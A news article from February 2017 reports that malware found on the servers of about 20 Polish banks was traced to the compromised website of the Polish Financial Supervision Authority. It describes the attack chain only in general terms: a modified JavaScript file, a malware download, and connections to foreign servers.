It is unclear who the hackers are or where they come from

Feb 6, 2017 14:56 GMT  ·  By

Polish banks discovered malware on their servers, and it seems the source is the Polish Financial Supervision Authority (KNF).

This seems to be the largest system hack in the country’s history, and it is considered a massive attack on the financial sector.

It all started after malware was discovered on the workstations of several companies. The source of the executables, however, was the one entity they didn’t expect it from - the KNF. According to the KNF, their internal systems had been compromised by a foreign agent, although no specifics were provided.

The regulator’s entire system was taken down in order to secure evidence after it was discovered that its servers were hosting malicious files and infecting various banking systems they were supposed to oversee and protect.

According to BadCyber, who spoke to several banks and performed an analysis of the situation, banks discovered unusual network traffic and discovered the encrypted executable files on several servers. A group of 20 commercial banks across Poland, as well as other banks, reported the same issues upon further investigation.

A high level of irony

The Polish Financial Supervision Authority is supposed to set the cybersecurity standards for Polish banks, which makes this situation particularly ironic. Experts believe that the whole situation is the result of a JavaScript file being modified, which made visitors to the regulator’s site load an external JS file, which then downloaded the malware.

Once the malware was downloaded and executed, it connected to some foreign servers. Then it could be used to do a bit of recon, lateral movement, and data exfiltration. According to the aforementioned source, it seems that, in some cases, the attackers managed to gain control over key servers within the bank infrastructure.

So far, there is no indication that people’s money were touched by hackers, or that operations were affected. This is, however, an ongoing investigation so things may change in the days to come as more information comes to light.